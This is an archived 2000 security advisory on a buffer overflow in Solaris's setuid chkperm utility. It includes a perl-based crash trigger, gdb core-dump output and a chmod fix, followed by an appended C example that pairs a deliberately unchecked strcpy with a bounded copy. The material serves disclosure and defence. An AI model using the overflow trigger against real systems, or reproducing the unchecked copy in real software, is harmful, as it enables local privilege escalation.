The OpenNET Project
 


[Hackerslab bug_paper] Solaris chkperm buffer overflow


Date: Thu, 6 Jan 2000 04:36:18 +0900
From: "KimYongJun" <[email protected]>
To: [email protected]
Subject: [Hackerslab bug_paper] Solaris chkperm buffer overflow

[Hackerslab bug_paper] Solaris chkperm buffer overflow


File   :   /usr/vmsys/bin/chkperm

SYSTEM :   Solaris 2.x


INFO :

We all know that /usr/vmsys/bin/chkperm contains a mountain of known bugs.

Here's one more that I found: the "Buffer Overflow" vulnerability.

The problem occurs when it gets the argument.
It accepts the argument without checking its length, and this causes the problem.

It seems that this vulnerability also applies to Solaris 7, the latest version.


[Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
Segmentation fault (core dumped)
[hackerslab:/users/loveyou/buf]$ gdb chkperm core
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (sparc-sun-solaris2.5.1),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxx'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0  0xef73ea68 in nvmatch ()


How to fix - Quick Reference
--------------------------

It is recommended that the suid bit be
removed from chkperm using the command:

 chmod 400 /usr/vmsys/bin/chkperm



- Yong jun Kim -
e - mail : [email protected]    ,  [email protected]
homepage : http://www.securesoft.co.kr ,  http://www.hackerslab.org

bye~   :)
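
The bug class reported above (an argument accepted without a length check), shown beside a bounded alternative. This is an added example, not part of the original post and not chkperm's code; the function names and the 64-byte buffer size are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF 64   /* assumed size; the advisory does not give chkperm's real buffer size */

/* Pattern the advisory describes: the argument is copied with no length check,
 * so anything of NAME_BUF bytes or more writes past the end of dst. */
void store_name_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: find the terminator within dstsz bytes before copying.
 * Returns 0 on success, -1 if arg is missing or does not fit (dst left empty). */
int store_name_checked(char *dst, size_t dstsz, const char *arg)
{
    const char *end;
    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (arg == NULL)
        return -1;
    end = memchr(arg, '\0', dstsz);      /* never scans more than dstsz bytes */
    if (end == NULL)
        return -1;                       /* too long: reject, do not truncate */
    memcpy(dst, arg, (size_t)(end - arg) + 1);
    return 0;
}

/* Stand-in for handling "-n <arg>": 0 if accepted, 2 (usage error) if rejected. */
int handle_n_option(const char *arg)
{
    char name[NAME_BUF];
    if (store_name_checked(name, sizeof name, arg) != 0) {
        fprintf(stderr, "-n: argument missing or longer than %d bytes\n", NAME_BUF - 1);
        return 2;
    }
    return 0;
}

int main(void)
{
    char arg[201];                       /* constructed input: 200 'x', as in the report */
    memset(arg, 'x', 200);
    arg[200] = '\0';
    printf("200-byte argument -> %d\n", handle_n_option(arg));
    printf("short argument    -> %d\n", handle_n_option("user1"));
    return 0;
}
```

Rejecting the overlong argument, rather than silently truncating it, keeps a privileged program from acting on a name the caller did not actually supply.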
